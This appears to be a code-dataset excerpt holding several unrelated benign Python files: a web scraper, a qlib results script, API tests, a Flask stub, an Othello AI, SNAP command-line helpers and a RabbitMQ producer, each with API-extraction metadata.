code
stringlengths 20
1.05M
| apis
sequence | extract_api
stringlengths 75
5.24M
|
---|---|---|
import os
from bs4 import BeautifulSoup
from urllib.request import Request, urlopen, urlretrieve
import wget
import requests
def download(url, file_name):
headers = {'User-Agent': 'Mozilla', 'Referer': 'https://animesvision.biz'}
r = requests.get(url, allow_redirects=True, headers=headers)
with open(file_name, 'wb') as f:
for chunk in r.iter_content(1024):
f.write(chunk)
return file_name
def getEpisodeList(url):
site = url # Removes the /n
print(site)
req = Request(site, headers={'User-Agent': 'Mozilla'})
webpage = urlopen(req).read()
soup = BeautifulSoup(webpage, 'html.parser')
episode_list = soup.findAll("div", {"class": "sli-btn"})
return episode_list
def getEpisodeLink(episode):
on_click_value = episode.find_all('a')[1]['onclick']
url_download = on_click_value.split('\'')[1]
req = Request(url_download, headers={'User-Agent': 'Mozilla'})
webpage = urlopen(req).read()
soup = BeautifulSoup(webpage, 'html.parser')
item_to_download = soup.find_all('a', attrs={'style':'margin: 5px;'})[0]['href']
return item_to_download
# def downloadAll(url):
# site = url # Removes the /n
# print(site)
# req = Request(site, headers={'User-Agent': 'Mozilla/5.0'})
# webpage = urlopen(req).read()
# soup = BeautifulSoup(webpage, 'html.parser')
# episode_list = soup.findAll("div", {"class": "sli-btn"})
# for episode in episode_list:
# on_click_value = episode.find_all('a')[1]['onclick']
# url_download = on_click_value.split('\'')[1]
# req = Request(url_download, headers={'User-Agent': 'Mozilla/5.0'})
# webpage = urlopen(req).read()
# soup = BeautifulSoup(webpage, 'html.parser')
# item_to_download = soup.find_all('a', attrs={'style':'margin: 5px;'})[0]['href']
# print(item_to_download.split('/')[-1])
# finished_download_item = download(item_to_download, url('/')[-1] + '_' + item_to_download.split('/')[-1])
# print(item_to_download) | [
"bs4.BeautifulSoup",
"urllib.request.Request",
"urllib.request.urlopen",
"requests.get"
] | [((250, 306), 'requests.get', 'requests.get', (['url'], {'allow_redirects': '(True)', 'headers': 'headers'}), '(url, allow_redirects=True, headers=headers)\n', (262, 306), False, 'import requests\n'), ((521, 569), 'urllib.request.Request', 'Request', (['site'], {'headers': "{'User-Agent': 'Mozilla'}"}), "(site, headers={'User-Agent': 'Mozilla'})\n", (528, 569), False, 'from urllib.request import Request, urlopen, urlretrieve\n'), ((616, 653), 'bs4.BeautifulSoup', 'BeautifulSoup', (['webpage', '"""html.parser"""'], {}), "(webpage, 'html.parser')\n", (629, 653), False, 'from bs4 import BeautifulSoup\n'), ((886, 942), 'urllib.request.Request', 'Request', (['url_download'], {'headers': "{'User-Agent': 'Mozilla'}"}), "(url_download, headers={'User-Agent': 'Mozilla'})\n", (893, 942), False, 'from urllib.request import Request, urlopen, urlretrieve\n'), ((989, 1026), 'bs4.BeautifulSoup', 'BeautifulSoup', (['webpage', '"""html.parser"""'], {}), "(webpage, 'html.parser')\n", (1002, 1026), False, 'from bs4 import BeautifulSoup\n'), ((584, 596), 'urllib.request.urlopen', 'urlopen', (['req'], {}), '(req)\n', (591, 596), False, 'from urllib.request import Request, urlopen, urlretrieve\n'), ((957, 969), 'urllib.request.urlopen', 'urlopen', (['req'], {}), '(req)\n', (964, 969), False, 'from urllib.request import Request, urlopen, urlretrieve\n')] |
#####################################################
# Copyright (c) <NAME> [GitHub D-X-Y], 2021.02 #
#####################################################
# python exps/trading/organize_results.py
#####################################################
import sys, argparse
import numpy as np
from typing import List, Text
from collections import defaultdict, OrderedDict
from pathlib import Path
from pprint import pprint
import ruamel.yaml as yaml
lib_dir = (Path(__file__).parent / ".." / ".." / "lib").resolve()
if str(lib_dir) not in sys.path:
sys.path.insert(0, str(lib_dir))
import qlib
from qlib.config import REG_CN
from qlib.workflow import R
class QResult:
def __init__(self):
self._result = defaultdict(list)
def append(self, key, value):
self._result[key].append(value)
@property
def result(self):
return self._result
def update(self, metrics, filter_keys=None):
for key, value in metrics.items():
if filter_keys is not None and key in filter_keys:
key = filter_keys[key]
elif filter_keys is not None:
continue
self.append(key, value)
@staticmethod
def full_str(xstr, space):
xformat = "{:" + str(space) + "s}"
return xformat.format(str(xstr))
def info(self, keys: List[Text], separate: Text = "", space: int = 25, show=True):
avaliable_keys = []
for key in keys:
if key not in self.result:
print("There are invalid key [{:}].".format(key))
else:
avaliable_keys.append(key)
head_str = separate.join([self.full_str(x, space) for x in avaliable_keys])
values = []
for key in avaliable_keys:
current_values = self._result[key]
mean = np.mean(current_values)
std = np.std(current_values)
values.append("{:.4f} $\pm$ {:.4f}".format(mean, std))
value_str = separate.join([self.full_str(x, space) for x in values])
if show:
print(head_str)
print(value_str)
else:
return head_str, value_str
def compare_results(heads, values, names, space=10):
for idx, x in enumerate(heads):
assert x == heads[0], "[{:}] {:} vs {:}".format(idx, x, heads[0])
new_head = QResult.full_str("Name", space) + heads[0]
print(new_head)
for name, value in zip(names, values):
xline = QResult.full_str(name, space) + value
print(xline)
def filter_finished(recorders):
returned_recorders = dict()
not_finished = 0
for key, recorder in recorders.items():
if recorder.status == "FINISHED":
returned_recorders[key] = recorder
else:
not_finished += 1
return returned_recorders, not_finished
def main(xargs):
R.reset_default_uri(xargs.save_dir)
experiments = R.list_experiments()
key_map = {
"IC": "IC",
"ICIR": "ICIR",
"Rank IC": "Rank_IC",
"Rank ICIR": "Rank_ICIR",
"excess_return_with_cost.annualized_return": "Annualized_Return",
"excess_return_with_cost.information_ratio": "Information_Ratio",
"excess_return_with_cost.max_drawdown": "Max_Drawdown",
}
all_keys = list(key_map.values())
print("There are {:} experiments.".format(len(experiments)))
head_strs, value_strs, names = [], [], []
for idx, (key, experiment) in enumerate(experiments.items()):
if experiment.id == "0":
continue
recorders = experiment.list_recorders()
recorders, not_finished = filter_finished(recorders)
print(
"====>>>> {:02d}/{:02d}-th experiment {:9s} has {:02d}/{:02d} finished recorders.".format(
idx, len(experiments), experiment.name, len(recorders), len(recorders) + not_finished
)
)
result = QResult()
for recorder_id, recorder in recorders.items():
result.update(recorder.list_metrics(), key_map)
head_str, value_str = result.info(all_keys, show=False)
head_strs.append(head_str)
value_strs.append(value_str)
names.append(experiment.name)
compare_results(head_strs, value_strs, names, space=10)
if __name__ == "__main__":
parser = argparse.ArgumentParser("Show Results")
parser.add_argument("--save_dir", type=str, default="./outputs/qlib-baselines", help="The checkpoint directory.")
args = parser.parse_args()
provider_uri = "~/.qlib/qlib_data/cn_data"
qlib.init(provider_uri=provider_uri, region=REG_CN)
main(args)
| [
"numpy.mean",
"argparse.ArgumentParser",
"pathlib.Path",
"qlib.workflow.R.reset_default_uri",
"qlib.init",
"collections.defaultdict",
"numpy.std",
"qlib.workflow.R.list_experiments"
] | [((2853, 2888), 'qlib.workflow.R.reset_default_uri', 'R.reset_default_uri', (['xargs.save_dir'], {}), '(xargs.save_dir)\n', (2872, 2888), False, 'from qlib.workflow import R\n'), ((2907, 2927), 'qlib.workflow.R.list_experiments', 'R.list_experiments', ([], {}), '()\n', (2925, 2927), False, 'from qlib.workflow import R\n'), ((4314, 4353), 'argparse.ArgumentParser', 'argparse.ArgumentParser', (['"""Show Results"""'], {}), "('Show Results')\n", (4337, 4353), False, 'import sys, argparse\n'), ((4555, 4606), 'qlib.init', 'qlib.init', ([], {'provider_uri': 'provider_uri', 'region': 'REG_CN'}), '(provider_uri=provider_uri, region=REG_CN)\n', (4564, 4606), False, 'import qlib\n'), ((723, 740), 'collections.defaultdict', 'defaultdict', (['list'], {}), '(list)\n', (734, 740), False, 'from collections import defaultdict, OrderedDict\n'), ((1825, 1848), 'numpy.mean', 'np.mean', (['current_values'], {}), '(current_values)\n', (1832, 1848), True, 'import numpy as np\n'), ((1867, 1889), 'numpy.std', 'np.std', (['current_values'], {}), '(current_values)\n', (1873, 1889), True, 'import numpy as np\n'), ((462, 476), 'pathlib.Path', 'Path', (['__file__'], {}), '(__file__)\n', (466, 476), False, 'from pathlib import Path\n')] |
# -*- coding: utf-8 -*-
import requests
from codeforces.User import User
from codeforces.Contest import Contest
from codeforces.Problem import Problem
from codeforces.Submission import Submission
def test_user():
params = {"handles": "Vicfred"}
r = requests.get("https://codeforces.com/api/user.info", params=params)
assert r.status_code == 200
json = r.json()
assert json["status"] == "OK"
result = json["result"]
assert len(result) >= 1
vicfred = User(**result[0])
assert vicfred.handle == "Vicfred"
print(vicfred)
def test_contest():
params = {"gym": "false"}
r = requests.get("https://codeforces.com/api/contest.list", params=params)
assert r.status_code == 200
json = r.json()
assert json["status"] == "OK"
result = json["result"]
assert len(result) >= 1
for contest in result:
print(Contest(**contest))
def test_problem():
params = {"tags": "implementation"}
r = requests.get("https://codeforces.com/api/problemset.problems", params=params)
assert r.status_code == 200
json = r.json()
assert json["status"] == "OK"
result = json["result"]
assert len(result) >= 1
for problem in result["problems"]:
print(Problem(**problem))
def test_submission():
params = {"handle": "Vicfred", "from": 1, "count": 10}
r = requests.get("https://codeforces.com/api/user.status", params=params)
assert r.status_code == 200
json = r.json()
assert json["status"] == "OK"
result = json["result"]
assert len(result) >= 1
for submission in result:
print(Submission(**submission))
| [
"codeforces.Submission.Submission",
"codeforces.User.User",
"codeforces.Contest.Contest",
"requests.get",
"codeforces.Problem.Problem"
] | [((259, 326), 'requests.get', 'requests.get', (['"""https://codeforces.com/api/user.info"""'], {'params': 'params'}), "('https://codeforces.com/api/user.info', params=params)\n", (271, 326), False, 'import requests\n'), ((483, 500), 'codeforces.User.User', 'User', ([], {}), '(**result[0])\n', (487, 500), False, 'from codeforces.User import User\n'), ((619, 689), 'requests.get', 'requests.get', (['"""https://codeforces.com/api/contest.list"""'], {'params': 'params'}), "('https://codeforces.com/api/contest.list', params=params)\n", (631, 689), False, 'import requests\n'), ((963, 1040), 'requests.get', 'requests.get', (['"""https://codeforces.com/api/problemset.problems"""'], {'params': 'params'}), "('https://codeforces.com/api/problemset.problems', params=params)\n", (975, 1040), False, 'import requests\n'), ((1348, 1417), 'requests.get', 'requests.get', (['"""https://codeforces.com/api/user.status"""'], {'params': 'params'}), "('https://codeforces.com/api/user.status', params=params)\n", (1360, 1417), False, 'import requests\n'), ((873, 891), 'codeforces.Contest.Contest', 'Contest', ([], {}), '(**contest)\n', (880, 891), False, 'from codeforces.Contest import Contest\n'), ((1236, 1254), 'codeforces.Problem.Problem', 'Problem', ([], {}), '(**problem)\n', (1243, 1254), False, 'from codeforces.Problem import Problem\n'), ((1604, 1628), 'codeforces.Submission.Submission', 'Submission', ([], {}), '(**submission)\n', (1614, 1628), False, 'from codeforces.Submission import Submission\n')] |
from flask import request
from common.request import jsoned
from tss.api import app
@app.route("/ping", methods=["GET", "POST"])
@jsoned({"action": "ping"})
def ping():
req = request.json
if req.get("action") == "ping":
return {"status": "pong"}
else:
return {"status": "invalid_action"}
@app.route("/create_task", methods=["POST"])
@jsoned({
"action": "create_task",
"user": "*",
"task_id": "id", #generate by ewi backend
"language": ["nvcc", "python.pycuda"],
"compiler_args": ["*"],
"program_args": ["*"],
"source_code": "*",
"source_hash": ""
})
def create_task():
req = request.json
#conn = get_mongo_connection()
#user_tasks = conn.tasks.find({"user": req.user})
#for task in user_tasks:
# if req.source_hash == task.source_hash:
# return {"status": "task_exists"}
# else:
# #some checks maybe
#maybe form another dict and do some checks
#conn.tasks.insert(req)
#return {"status": "task_registered"}
if req.get("action", False) == "create_task":
return {
"status": "task_registered",
"user": req["user"],
"task_id": req["task_id"]
}
else:
return {"status": "invalid_action"}
@app.route("/task_info", methods=["POST"])
@jsoned({
"action": "task_info",
"user": "*",
"task_id": "id"
})
def task_info():
req = request.json
#conn = get_mongo_connection()
#task = conn.tasks.find_one({"task_id": req["task_id"]})
#maybe alter something
#if task:
# return {"status": "ok",
# "task_status": task["status"],
# ### other info}
#else:
# return {"status": "error",
# "description": "task {0} not found".format(req["task_id"])}
return {"status": "test_status"}
@app.route("/list_tasks", methods=["POST"])
@jsoned({
"action": "list_tasks",
"user": "*",
"filter": ["done", "send", "fail"]
})
def list_tasks():
req = request.json
return {"status": "no_such_tasks"}
| [
"common.request.jsoned",
"tss.api.app.route"
] | [((88, 131), 'tss.api.app.route', 'app.route', (['"""/ping"""'], {'methods': "['GET', 'POST']"}), "('/ping', methods=['GET', 'POST'])\n", (97, 131), False, 'from tss.api import app\n'), ((133, 159), 'common.request.jsoned', 'jsoned', (["{'action': 'ping'}"], {}), "({'action': 'ping'})\n", (139, 159), False, 'from common.request import jsoned\n'), ((322, 365), 'tss.api.app.route', 'app.route', (['"""/create_task"""'], {'methods': "['POST']"}), "('/create_task', methods=['POST'])\n", (331, 365), False, 'from tss.api import app\n'), ((367, 564), 'common.request.jsoned', 'jsoned', (["{'action': 'create_task', 'user': '*', 'task_id': 'id', 'language': ['nvcc',\n 'python.pycuda'], 'compiler_args': ['*'], 'program_args': ['*'],\n 'source_code': '*', 'source_hash': ''}"], {}), "({'action': 'create_task', 'user': '*', 'task_id': 'id', 'language':\n ['nvcc', 'python.pycuda'], 'compiler_args': ['*'], 'program_args': ['*'\n ], 'source_code': '*', 'source_hash': ''})\n", (373, 564), False, 'from common.request import jsoned\n'), ((1278, 1319), 'tss.api.app.route', 'app.route', (['"""/task_info"""'], {'methods': "['POST']"}), "('/task_info', methods=['POST'])\n", (1287, 1319), False, 'from tss.api import app\n'), ((1321, 1382), 'common.request.jsoned', 'jsoned', (["{'action': 'task_info', 'user': '*', 'task_id': 'id'}"], {}), "({'action': 'task_info', 'user': '*', 'task_id': 'id'})\n", (1327, 1382), False, 'from common.request import jsoned\n'), ((1852, 1894), 'tss.api.app.route', 'app.route', (['"""/list_tasks"""'], {'methods': "['POST']"}), "('/list_tasks', methods=['POST'])\n", (1861, 1894), False, 'from tss.api import app\n'), ((1896, 1981), 'common.request.jsoned', 'jsoned', (["{'action': 'list_tasks', 'user': '*', 'filter': ['done', 'send', 'fail']}"], {}), "({'action': 'list_tasks', 'user': '*', 'filter': ['done', 'send',\n 'fail']})\n", (1902, 1981), False, 'from common.request import jsoned\n')] |
import copy
import random
from piece import Piece
class Player(object):
def __init__(self, name, stone_type):
self.name = name
self.stone_type = stone_type
self.turn = False
self.score = 0
class Enemy(Player):
"""Player with an AI.
"""
def get_possible_moves(self, board):
"""Returns a list of [x,y] lists of valid moves on the given board.
"""
# Check every tile on the board, get list of possible valid places
valids = []
for x in range(1, board.width + 1):
for y in range(1, board.height + 1):
new_piece = Piece(
position=(x - 1, y - 1),
state=self.stone_type
)
if board.is_valid_move(new_piece):
valids.append(new_piece)
return valids
def get_move(self, board):
"""
Args:
board: The Board to look for moves on.
Returns:
False if no moves, else the Piece selected
"""
possible_moves = self.get_possible_moves(board)
if len(possible_moves) == 0:
return False
# Randomize starting point
random.shuffle(possible_moves)
# Corner takes priority
for p in possible_moves:
if board.is_corner(p.x, p.y):
return p
# Can't go to corner, so find best possible move
best_score = -1
best_move = possible_moves[0]
for p in possible_moves:
b = copy.deepcopy(board)
result = b.try_move((p.x, p.y), self.stone_type)
if result > best_score:
best_move = p
best_score = result
return best_move
| [
"piece.Piece",
"random.shuffle",
"copy.deepcopy"
] | [((1219, 1249), 'random.shuffle', 'random.shuffle', (['possible_moves'], {}), '(possible_moves)\n', (1233, 1249), False, 'import random\n'), ((1553, 1573), 'copy.deepcopy', 'copy.deepcopy', (['board'], {}), '(board)\n', (1566, 1573), False, 'import copy\n'), ((632, 685), 'piece.Piece', 'Piece', ([], {'position': '(x - 1, y - 1)', 'state': 'self.stone_type'}), '(position=(x - 1, y - 1), state=self.stone_type)\n', (637, 685), False, 'from piece import Piece\n')] |
# -*- coding: utf-8 -*-
# Copyright 2021, SERTIT-ICube - France, https://sertit.unistra.fr/
# This file is part of sertit-utils project
# https://github.com/sertit/sertit-utils
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
SNAP tools
"""
import logging
import os
import psutil
from sertit import misc, strings
from sertit.logs import SU_NAME
MAX_CORES = os.cpu_count() - 2
MAX_MEM = int(os.environ.get("JAVA_OPTS_XMX", 0.95 * psutil.virtual_memory().total))
TILE_SIZE = 2048
LOGGER = logging.getLogger(SU_NAME)
def bytes2snap(nof_bytes: int) -> str:
"""
Convert nof bytes into snap-compatible Java options.
.. code-block:: python
>>> bytes2snap(32000)
'31K'
Args:
nof_bytes (int): Byte nb
Returns:
str: Human-readable in bits
"""
symbols = ("K", "M", "G", "T", "P", "E", "Z", "Y")
prefix = {}
for idx, sym in enumerate(symbols):
prefix[sym] = 1 << (idx + 1) * 10
for sym in reversed(symbols):
if nof_bytes >= prefix[sym]:
value = int(float(nof_bytes) / prefix[sym])
return "%s%s" % (value, sym)
return "%sB" % nof_bytes
def get_gpt_cli(
graph_path: str, other_args: list, display_snap_opt: bool = False
) -> list:
"""
Get GPT command line with system OK optimizations.
To see options, type this command line with --diag (but it won't run the graph)
.. code-block:: python
>>> get_gpt_cli("graph_path", other_args=[], display_snap_opt=True)
SNAP Release version 8.0
SNAP home: C:\Program Files\snap\bin\/..
SNAP debug: null
SNAP log level: WARNING
Java home: c:\program files\snap\jre\jre
Java version: 1.8.0_242
Processors: 16
Max memory: 53.3 GB
Cache size: 30.0 GB
Tile parallelism: 14
Tile size: 2048 x 2048 pixels
To configure your gpt memory usage:
Edit snap/bin/gpt.vmoptions
To configure your gpt cache size and parallelism:
Edit .snap/etc/snap.properties or gpt -c ${cachesize-in-GB}G -q ${parallelism}
['gpt', '"graph_path"', '-q', 14, '-J-Xms2G -J-Xmx60G', '-J-Dsnap.log.level=WARNING',
'-J-Dsnap.jai.defaultTileSize=2048', '-J-Dsnap.dataio.reader.tileWidth=2048',
'-J-Dsnap.dataio.reader.tileHeigh=2048', '-J-Dsnap.jai.prefetchTiles=true', '-c 30G']
Args:
graph_path (str): Graph path
other_args (list): Other args as a list such as `['-Pfile="in_file.zip", '-Pout="out_file.dim"']`
display_snap_opt (bool): Display SNAP options via --diag
Returns:
list: GPT command line as a list
"""
gpt_cli = [
"gpt",
strings.to_cmd_string(graph_path),
"-q",
MAX_CORES, # Maximum parallelism
f"-J-Xms2G -J-Xmx{bytes2snap(MAX_MEM)}", # Initially/max allocated memory
"-J-Dsnap.log.level=WARNING",
f"-J-Dsnap.jai.defaultTileSize={TILE_SIZE}",
f"-J-Dsnap.dataio.reader.tileWidth={TILE_SIZE}",
f"-J-Dsnap.dataio.reader.tileHeight={TILE_SIZE}",
"-J-Dsnap.jai.prefetchTiles=true",
f"-c {bytes2snap(int(0.5 * MAX_MEM))}", # Tile cache set to 50% of max memory (up to 75%)
# '-x',
*other_args,
] # Clears the internal tile cache after writing a complete row to the target file
# LOGs
LOGGER.debug(gpt_cli)
if display_snap_opt:
misc.run_cli(gpt_cli + ["--diag"])
return gpt_cli
| [
"logging.getLogger",
"sertit.misc.run_cli",
"psutil.virtual_memory",
"sertit.strings.to_cmd_string",
"os.cpu_count"
] | [((995, 1021), 'logging.getLogger', 'logging.getLogger', (['SU_NAME'], {}), '(SU_NAME)\n', (1012, 1021), False, 'import logging\n'), ((865, 879), 'os.cpu_count', 'os.cpu_count', ([], {}), '()\n', (877, 879), False, 'import os\n'), ((3193, 3226), 'sertit.strings.to_cmd_string', 'strings.to_cmd_string', (['graph_path'], {}), '(graph_path)\n', (3214, 3226), False, 'from sertit import misc, strings\n'), ((3911, 3945), 'sertit.misc.run_cli', 'misc.run_cli', (["(gpt_cli + ['--diag'])"], {}), "(gpt_cli + ['--diag'])\n", (3923, 3945), False, 'from sertit import misc, strings\n'), ((937, 960), 'psutil.virtual_memory', 'psutil.virtual_memory', ([], {}), '()\n', (958, 960), False, 'import psutil\n')] |
import json
from django.http import HttpResponse
from sms_handler.SmsParser import SmsParser
sample_sms = "J1!test_form_2!uuid#ce546ca8b4c44c329685cffccb7c90c8\
#Question_1#option_3#Question_2#option_2 option_3 option_5\
#Question_3#Bdhud\#\#\#\#hbxbc#Question_4#8451#Question_5#469464.349\
#question_6#2016-01-18#Question_7#16:20:00.000+05:45#Question_8\
#27.7111128 85.318415 0.0 36.0#Question_9#1453113337876.jpg#Question_10\
#1453113348755.amr#Question_11#1453113368638.mp4#start\
#2016-01-18T16:19:38.539+05:45#end#2016-01-18T16:21:15.762+05:45\
#instanceID#uuid:9eea2d7d-8091-4d22-8472-bbbe3395b25f#"
def sms_data_api(request):
sms_parser = SmsParser(sample_sms)
return HttpResponse(json.dumps(sms_parser.parameters))
| [
"json.dumps",
"sms_handler.SmsParser.SmsParser"
] | [((657, 678), 'sms_handler.SmsParser.SmsParser', 'SmsParser', (['sample_sms'], {}), '(sample_sms)\n', (666, 678), False, 'from sms_handler.SmsParser import SmsParser\n'), ((703, 736), 'json.dumps', 'json.dumps', (['sms_parser.parameters'], {}), '(sms_parser.parameters)\n', (713, 736), False, 'import json\n')] |
import os
import csv
import logging
import itertools
import data
class MirCat(object):
def __init__(self, directory=None):
"""
http://www.mirrna.org/
"""
if not directory:
directory = data.source_data_dir('mircat')
self.directory = directory
def read_file(self, name):
path = os.path.join(self.directory, name)
with open(path) as read_file:
reader = csv.DictReader(read_file, delimiter='\t')
for row in reader:
yield row
def read_mirna(self):
name_to_mircat = dict()
identifier_to_genes = data.Data().mirbase.identifier_to_genes
matched = 0
for row in self.read_file('mirna.txt'):
mircat_name = row['mircat_name']
hgncs = identifier_to_genes(mircat_name)
if hgncs is None:
replaced = mircat_name.replace('-miR-', '-mir-')
hgncs = identifier_to_genes(replaced)
if hgncs:
matched += 1
row['hgncs'] = hgncs
name_to_mircat[mircat_name] = row
logging.info('MirCat miRNAs matched to HGNC {} out of {}'.format(
matched, len(name_to_mircat)))
return name_to_mircat
def read_targets(self):
symbol_to_gene = data.Data().hgnc.get_symbol_to_gene()
name_to_mircat = self.read_mirna()
mirna_targets = list()
for row in self.read_file('target.txt'):
target = symbol_to_gene.get(row['gene_symbol'])
mircat_row = name_to_mircat[row['mircat_name']]
sources = mircat_row['hgncs']
row['target'] = target
row['sources'] = sources
if not target or not sources:
continue
yield row
def interaction_generator(self):
for row in self.read_targets():
target = row['target']
for source in row['sources']:
interaction = {'source': source, 'target': target, 'pubmed': row['pubmed']}
yield interaction
if __name__ == '__main__':
mircat = MirCat()
#mircat.read_mirna()
#mircat.read_targets()
import pprint
ixns = list(mircat.interaction_generator())
pprint.pprint(ixns)
| [
"csv.DictReader",
"data.source_data_dir",
"os.path.join",
"data.Data",
"pprint.pprint"
] | [((2300, 2319), 'pprint.pprint', 'pprint.pprint', (['ixns'], {}), '(ixns)\n', (2313, 2319), False, 'import pprint\n'), ((357, 391), 'os.path.join', 'os.path.join', (['self.directory', 'name'], {}), '(self.directory, name)\n', (369, 391), False, 'import os\n'), ((240, 270), 'data.source_data_dir', 'data.source_data_dir', (['"""mircat"""'], {}), "('mircat')\n", (260, 270), False, 'import data\n'), ((451, 492), 'csv.DictReader', 'csv.DictReader', (['read_file'], {'delimiter': '"""\t"""'}), "(read_file, delimiter='\\t')\n", (465, 492), False, 'import csv\n'), ((639, 650), 'data.Data', 'data.Data', ([], {}), '()\n', (648, 650), False, 'import data\n'), ((1329, 1340), 'data.Data', 'data.Data', ([], {}), '()\n', (1338, 1340), False, 'import data\n')] |
from random import randint
from uuid import uuid4
from faker import Faker
from stilio.persistence import database
from stilio.persistence.database import db
from stilio.persistence.torrents.models import Torrent, File
@db.connection_context()
def create_fake_data() -> None:
fake = Faker()
for i in range(1_000):
torrent_id = Torrent.insert(info_hash=uuid4(), name=fake.text()[10:]).execute()
for j in range(randint(1, 10)):
File.insert(
path="path", size=randint(1, 10000), torrent=torrent_id
).execute()
print(f"Added torrent with ID {torrent_id} to the database")
if __name__ == "__main__":
database.init()
create_fake_data()
| [
"stilio.persistence.database.init",
"uuid.uuid4",
"faker.Faker",
"stilio.persistence.database.db.connection_context",
"random.randint"
] | [((223, 246), 'stilio.persistence.database.db.connection_context', 'db.connection_context', ([], {}), '()\n', (244, 246), False, 'from stilio.persistence.database import db\n'), ((290, 297), 'faker.Faker', 'Faker', ([], {}), '()\n', (295, 297), False, 'from faker import Faker\n'), ((676, 691), 'stilio.persistence.database.init', 'database.init', ([], {}), '()\n', (689, 691), False, 'from stilio.persistence import database\n'), ((436, 450), 'random.randint', 'randint', (['(1)', '(10)'], {}), '(1, 10)\n', (443, 450), False, 'from random import randint\n'), ((371, 378), 'uuid.uuid4', 'uuid4', ([], {}), '()\n', (376, 378), False, 'from uuid import uuid4\n'), ((512, 529), 'random.randint', 'randint', (['(1)', '(10000)'], {}), '(1, 10000)\n', (519, 529), False, 'from random import randint\n')] |
import discord
from discord.ext import commands
import sys
import random
sys.path.insert(1, '../')
from config import *
sys.path.insert(1, '../constants')
from colors import *
from constants import *
#Loading Cog
class utoimages(commands.Cog):
def __init__(self, bot):
self.bot = bot
def setup(bot):
bot.add_cog(utoimages(bot))
bot.add_command(utoimg)
@commands.command(aliases=["utoimage", "utopic"])
async def utoimg(ctx):
web = "https://the-bot.tk/uto/"
unallowed = [235, 255, 336, 311, 272, 71]
x = random.randrange(0, 385)
if int(x) in unallowed:
x = 1
web = web + str(x) + ".jpg"
embed=discord.Embed(title="Random Uto Image", color=0x9aecdb)
embed.set_footer(text=f"Bot version: {const.version}")
embed.set_image(url=web)
await ctx.send(embed=embed)
print(f"{ctx.author.name}#{ctx.author.discriminator} issued .utoimg at {ctx.author.guild.name}") | [
"sys.path.insert",
"discord.Embed",
"discord.ext.commands.command",
"random.randrange"
] | [((76, 101), 'sys.path.insert', 'sys.path.insert', (['(1)', '"""../"""'], {}), "(1, '../')\n", (91, 101), False, 'import sys\n'), ((123, 157), 'sys.path.insert', 'sys.path.insert', (['(1)', '"""../constants"""'], {}), "(1, '../constants')\n", (138, 157), False, 'import sys\n'), ((380, 428), 'discord.ext.commands.command', 'commands.command', ([], {'aliases': "['utoimage', 'utopic']"}), "(aliases=['utoimage', 'utopic'])\n", (396, 428), False, 'from discord.ext import commands\n'), ((542, 566), 'random.randrange', 'random.randrange', (['(0)', '(385)'], {}), '(0, 385)\n', (558, 566), False, 'import random\n'), ((651, 706), 'discord.Embed', 'discord.Embed', ([], {'title': '"""Random Uto Image"""', 'color': '(10153179)'}), "(title='Random Uto Image', color=10153179)\n", (664, 706), False, 'import discord\n')] |
import pika
from pymongo import MongoClient
import time
import os
import random
import string
task_queue = os.environ['TASK_QUEUE']
def wait_for_queue_connection():
while True:
try:
credentials = pika.PlainCredentials(os.environ['RABBITMQ_USER'],
os.environ['RABBITMQ_PASS'])
params = pika.ConnectionParameters('rabbitmq', os.environ['RABBITMQ_PORT'], '/', credentials, heartbeat=0)
connection = pika.BlockingConnection(params)
break
except Exception as ex:
print("Producer not connected to queue yet..")
time.sleep(1)
print("Connected")
return connection
connection = wait_for_queue_connection()
channel = connection.channel()
channel.queue_declare(queue=task_queue, durable=True)
channel.basic_qos(prefetch_count=1)
mongo_client = MongoClient('mongodb://mongodb:27017')
def get_random_string(length: int) -> str:
letters = string.ascii_lowercase
result_str = ''.join(random.choice(letters) for i in range(length))
return result_str
while True:
channel.basic_publish(exchange='',
routing_key='task_queue',
body=get_random_string(random.randint(1, 20)))
print("produced 1")
time.sleep(10)
| [
"random.choice",
"pika.ConnectionParameters",
"pika.BlockingConnection",
"pika.PlainCredentials",
"time.sleep",
"pymongo.MongoClient",
"random.randint"
] | [((886, 924), 'pymongo.MongoClient', 'MongoClient', (['"""mongodb://mongodb:27017"""'], {}), "('mongodb://mongodb:27017')\n", (897, 924), False, 'from pymongo import MongoClient\n'), ((1321, 1335), 'time.sleep', 'time.sleep', (['(10)'], {}), '(10)\n', (1331, 1335), False, 'import time\n'), ((222, 301), 'pika.PlainCredentials', 'pika.PlainCredentials', (["os.environ['RABBITMQ_USER']", "os.environ['RABBITMQ_PASS']"], {}), "(os.environ['RABBITMQ_USER'], os.environ['RABBITMQ_PASS'])\n", (243, 301), False, 'import pika\n'), ((371, 472), 'pika.ConnectionParameters', 'pika.ConnectionParameters', (['"""rabbitmq"""', "os.environ['RABBITMQ_PORT']", '"""/"""', 'credentials'], {'heartbeat': '(0)'}), "('rabbitmq', os.environ['RABBITMQ_PORT'], '/',\n credentials, heartbeat=0)\n", (396, 472), False, 'import pika\n'), ((494, 525), 'pika.BlockingConnection', 'pika.BlockingConnection', (['params'], {}), '(params)\n', (517, 525), False, 'import pika\n'), ((1031, 1053), 'random.choice', 'random.choice', (['letters'], {}), '(letters)\n', (1044, 1053), False, 'import random\n'), ((647, 660), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (657, 660), False, 'import time\n'), ((1269, 1290), 'random.randint', 'random.randint', (['(1)', '(20)'], {}), '(1, 20)\n', (1283, 1290), False, 'import random\n')] |
import unittest
from problems.problem10 import solution
class Test(unittest.TestCase):
def test(self):
self.assertEqual(solution([4, 5, 6, 7, 0, 1, 2], 0), 4)
self.assertEqual(solution([4, 5, 6, 7, 0, 1, 2], 3), -1)
self.assertEqual(solution([3, 1], 1), 1)
self.assertEqual(solution([3, 1], 3), 0)
self.assertEqual(solution([1, 3, 5], 3), 1)
self.assertEqual(solution([3, 5, 1], 5), 1)
| [
"problems.problem10.solution"
